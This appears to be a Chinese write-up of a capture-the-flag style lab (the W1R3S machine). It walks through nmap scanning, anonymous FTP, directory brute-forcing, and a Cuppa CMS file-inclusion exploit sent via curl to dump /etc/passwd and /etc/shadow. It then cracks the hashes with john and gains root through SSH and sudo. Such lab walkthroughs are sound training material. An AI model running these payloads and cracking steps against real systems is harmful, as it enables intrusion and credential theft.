信息收集
第一步,使用ifconfig命令检查kali虚拟机网段
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.132 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe17:9209 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:17:92:09 txqueuelen 1000 (Ethernet)
RX packets 75 bytes 7064 (6.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 46 bytes 5486 (5.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
接下来在靶机打开之前,进行nmap的主机发现nmap -sn 192.168.1.000/24
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.000/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:06 CST
Nmap scan report for 192.168.1.2
Host is up (0.00026s latency).
Nmap scan report for 192.168.1.132
Host is up (0.00018s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.54 seconds
靶机打开之后,再进行一次主机发现
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.000/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:07 CST
Nmap scan report for 192.168.1.2
Host is up (0.00046s latency).
Nmap scan report for 192.168.1.132
Host is up (0.0011s latency).
Nmap scan report for 192.168.1.133
Host is up (0.00025s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 5.01 seconds
对比两次结果,可以得知靶机的ip地址为192.168.1.133
接下来对靶机进行端口的扫描
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -min-rate=10000 -p- 192.168.1.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:10 CST
Nmap scan report for 192.168.1.133
Host is up (0.00015s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds
结果发现四个端口开启了服务,其中ftp、mysql、ssh是我们比较感兴趣的端口,这里先做一个记录
接下对这几个端口以及靶机进行更深度的扫描sudo nmap -sT -sV -O -p 21,22,80,3306 192.168.1.133,这里注意进行tcp以及udp扫描时要有root权限
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -O -p 21,22,80,3306 192.168.1.133
[sudo] password for pixe1_p0ints:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:13 CST
Nmap scan report for 192.168.1.133
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Linux 3.13 - 3.16 (93%), Linux 4.10 (93%), Linux 3.4 - 3.10 (93%), Linux 3.10 (93%), Linux 4.4 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 3.16 - 4.6 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.94 seconds
并没有什么特别有价值的信息,那么我就用UDP协议扫一下sudo nmap -sU -p21,22,80,3306 172.19.0.15
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ sudo nmap -sU -p21,22,80,3306 172.19.0.15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-29 19:09 CST
Nmap scan report for 172.19.0.15
Host is up (0.00019s latency).
PORT STATE SERVICE
21/udp open|filtered ftp
22/udp open|filtered ssh
80/udp open|filtered http
3306/udp closed mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds
这边换了设备,地址稍微发生了一些变化
UDP协议的信息也不是很全面
除此之外,nmap中还有脚本扫描可以选择,nmap -script=vuln -p21,22,80,3306 172.19.0.15
vuln(Vulnerability)是nmap默认的漏洞扫描脚本,这一贴一篇其他大佬整理的nmmp脚本使用介绍https://zhuanlan.zhihu.com/p/441216448
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -script=vuln -p21,22,80,3306 172.19.0.15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-29 19:20 CST
Nmap scan report for 172.19.0.15
Host is up (0.00033s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
|_ /wordpress/wp-login.php: Wordpress login page.
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 321.62 seconds
这里提示没有发现XSS以及CSRF漏洞,但是发现可以利用DDOS攻击,不过DDOS不太优雅,这这里弃用
返回的信息又提示,存在wordpress的页面,可以记一下,或许有可以利用的漏洞
FTP漏洞利用
信息收集的部分到这里也就差不多结束了,接下俩根据之前收集到的信息进行漏洞的利用
首先是FTP,ftp的匿名登录是anonymous,密码空,输入后直接登录
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ftp 172.19.0.15
Connected to 172.19.0.15.
220 Welcome to W1R3S.inc FTP service.
Name (172.19.0.15:pixe1_p0ints): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
成功登录,还是比较顺利的
切换到目录下查看文件,并且用mget命令把文件down下来
逐个查看
这里有两串编码,看着很可疑,很像MD5和base64,到底是不是,其实kali有一款工具可以大概识别一些
工具识别结果是MD5,那先放初步小破一下
烟雾弹,无用信息,base64也解一下
不出意料,也是烟雾弹
worktdo.txt的内容如下,提示我们ftp不是提权的正确方式
此路不通,但文件还没有看完
员工名单,类似经理、人事、技术员这样的职业是需要引起注意的
web渗透
ftp部分结束了,接下来看一下80端口的内容,直接访问,是一个apache的默认页面
可能有其他目录,但是我们不知道,做一下爆破
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ dirb http://172.19.0.15
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Dec 29 20:37:09 2023
URL_BASE: http://172.19.0.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.19.0.15/ ----
==> DIRECTORY: http://172.19.0.15/administrator/
+ http://172.19.0.15/index.html (CODE:200|SIZE:11321)
==> DIRECTORY: http://172.19.0.15/javascript/
+ http://172.19.0.15/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://172.19.0.15/wordpress/
---- Entering directory: http://172.19.0.15/administrator/ ----
==> DIRECTORY: http://172.19.0.15/administrator/alerts/
==> DIRECTORY: http://172.19.0.15/administrator/api/
==> DIRECTORY: http://172.19.0.15/administrator/classes/
==> DIRECTORY: http://172.19.0.15/administrator/components/
==> DIRECTORY: http://172.19.0.15/administrator/extensions/
+ http://172.19.0.15/administrator/index.php (CODE:302|SIZE:6943)
==> DIRECTORY: http://172.19.0.15/administrator/installation/
==> DIRECTORY: http://172.19.0.15/administrator/js/
==> DIRECTORY: http://172.19.0.15/administrator/language/
==> DIRECTORY: http://172.19.0.15/administrator/media/
+ http://172.19.0.15/administrator/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://172.19.0.15/administrator/templates/
---- Entering directory: http://172.19.0.15/javascript/ ----
==> DIRECTORY: http://172.19.0.15/javascript/jquery/
---- Entering directory: http://172.19.0.15/wordpress/ ----
+ http://172.19.0.15/wordpress/index.php (CODE:200|SIZE:55843)
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-includes/
+ http://172.19.0.15/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://172.19.0.15/administrator/alerts/ ----
+ http://172.19.0.15/administrator/alerts/index.html (CODE:200|SIZE:31)
---- Entering directory: http://172.19.0.15/administrator/api/ ----
==> DIRECTORY: http://172.19.0.15/administrator/api/administrator/
+ http://172.19.0.15/administrator/api/index.php (CODE:200|SIZE:62)
==> DIRECTORY: http://172.19.0.15/administrator/api/test/
---- Entering directory: http://172.19.0.15/administrator/classes/ ----
==> DIRECTORY: http://172.19.0.15/administrator/classes/ajax/
+ http://172.19.0.15/administrator/classes/index.html (CODE:200|SIZE:31)
---- Entering directory: http://172.19.0.15/administrator/components/ ----
==> DIRECTORY: http://172.19.0.15/administrator/components/configuration/
+ http://172.19.0.15/administrator/components/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://172.19.0.15/administrator/components/menu/
==> DIRECTORY: http://172.19.0.15/administrator/components/stats/
---- Entering directory: http://172.19.0.15/administrator/extensions/ ----
==> DIRECTORY: http://172.19.0.15/administrator/extensions/banners/
==> DIRECTORY: http://172.19.0.15/administrator/extensions/content/
+ http://172.19.0.15/administrator/extensions/index.html (CODE:200|SIZE:31)
---- Entering directory: http://172.19.0.15/administrator/installation/ ----
==> DIRECTORY: http://172.19.0.15/administrator/installation/html/
+ http://172.19.0.15/administrator/installation/index.php (CODE:200|SIZE:4322)
---- Entering directory: http://172.19.0.15/administrator/js/ ----
==> DIRECTORY: http://172.19.0.15/administrator/js/filemanager/
+ http://172.19.0.15/administrator/js/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://172.19.0.15/administrator/js/jquery/
==> DIRECTORY: http://172.19.0.15/administrator/js/tiny_mce/
---- Entering directory: http://172.19.0.15/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/templates/ ----
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/
+ http://172.19.0.15/administrator/templates/index.html (CODE:200|SIZE:31)
---- Entering directory: http://172.19.0.15/javascript/jquery/ ----
+ http://172.19.0.15/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/ ----
+ http://172.19.0.15/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/css/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/images/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/includes/
+ http://172.19.0.15/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/js/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/maint/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/network/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/user/
---- Entering directory: http://172.19.0.15/wordpress/wp-content/ ----
+ http://172.19.0.15/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/plugins/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/themes/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/upgrade/
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/uploads/
---- Entering directory: http://172.19.0.15/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/api/administrator/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/api/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/classes/ajax/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/components/configuration/ ----
==> DIRECTORY: http://172.19.0.15/administrator/components/configuration/html/
+ http://172.19.0.15/administrator/components/configuration/index.php (CODE:200|SIZE:45)
---- Entering directory: http://172.19.0.15/administrator/components/menu/ ----
==> DIRECTORY: http://172.19.0.15/administrator/components/menu/classes/
==> DIRECTORY: http://172.19.0.15/administrator/components/menu/html/
+ http://172.19.0.15/administrator/components/menu/index.php (CODE:200|SIZE:45)
---- Entering directory: http://172.19.0.15/administrator/components/stats/ ----
+ http://172.19.0.15/administrator/components/stats/index.php (CODE:200|SIZE:45)
---- Entering directory: http://172.19.0.15/administrator/extensions/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/extensions/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/installation/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/js/filemanager/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/js/jquery/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/js/tiny_mce/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/templates/default/ ----
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/classes/
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/css/
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/html/
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/images/
+ http://172.19.0.15/administrator/templates/default/index.php (CODE:500|SIZE:0)
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/network/ ----
+ http://172.19.0.15/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://172.19.0.15/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/user/ ----
+ http://172.19.0.15/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://172.19.0.15/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://172.19.0.15/wordpress/wp-content/plugins/ ----
+ http://172.19.0.15/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://172.19.0.15/wordpress/wp-content/themes/ ----
+ http://172.19.0.15/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://172.19.0.15/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/components/configuration/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/components/menu/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/components/menu/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/templates/default/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/templates/default/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/templates/default/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.19.0.15/administrator/templates/default/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Dec 29 20:38:14 2023
DOWNLOADED: 106076 - FOUND: 28
我们尝试访问一下index.php,自动跳转到了/administrator/installation/
这里我们可以看出网站的CMS是cuppa,而且这是一个安装页面,安装是要写入权限的,很有可能存在漏洞
点击“Next”进入安装页面
但是安装就意味着风险,你并不知道这步操作会不话覆盖服务器或者被运维人员发现
无视风险,直接安装
这里忘了截图,返回的信息告诉我们的数据库创建成功,但是adminsitrator账户没有创建成功,除此之外也没有其他信息了,只能点击back返回,显然此路不通
这里我门可以使用searchsploit工具搜一下漏洞searchsploit cuppa cms
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ searchsploit cuppa cms
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/ | php/webapps/25971.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results
这里只有一个结果,我们down下来看一下searchsploit cuppa cms -m 25971.txt
提示我们存在一个文件包含漏洞
路径不存在,说明这个路径是错误的
我们在之前的安装页面以及dirb扫出的路径下,发现了网站目录都是以administrator开头的,我们可以合理怀疑网站的根目录就是administrator目录,尝试一下
访问成功,路径是对的,但是没有内容,在25719.txt中提到了编码的问题,使用了php伪协议读取了文件内容,我们可以消效仿一下
http://172.19.0.15/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../../../../../../../../../etc/passwd
还是没有内容,应该漏洞是存在的,也能成功访问,说明不是利用的问题;这里可以去看一下源码cuppa cms是一套开源的内容管理系统,互联网上都是可以找到源码的
成功找到,漏洞还没有被修复
<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>
找到原因了,这里是用POST进行传参,而我们使用的是GET,自然没有回显
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://172.19.0.15/administrator/alerts/alertConfigField.php
--data-urlencode是指以post的方式发送url编码的请求
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
成功爆出我们想要的内容,但这还不够,为了拿到密码我们还需要shadow文件
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://172.19.0.15/administrator/alerts/alertConfigField.php
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
我们将信息保存在password文件下,进行密码爆破
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ john password
Created directory: /home/pixe1_p0ints/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data (www-data)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer (w1r3s)
2g 0:00:00:01 DONE 2/3 (2023-12-30 10:54) 1.739g/s 3503p/s 3504c/s 3504C/s 123456..random
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
这里提示我们很有可能是使用sha512加盐进行的加密,www-data的密码是www-data,w1r3s的密码是computer
我们尝试登录www-data,但是好像并没有有bash的权限,只给我们看了一些信息
那换一个账号登录
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh w1r3s@172.19.0.15
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@172.19.0.15's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
102 packages can be updated.
0 updates are security updates.
New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$
成功登录,查看权限
w1r3s@W1R3S:~$ whoami
w1r3s
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
提示有全部权限,渗透成功
sudo /bin/bash
cd root
ls
cat flag.txt
成功读取flag
664
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
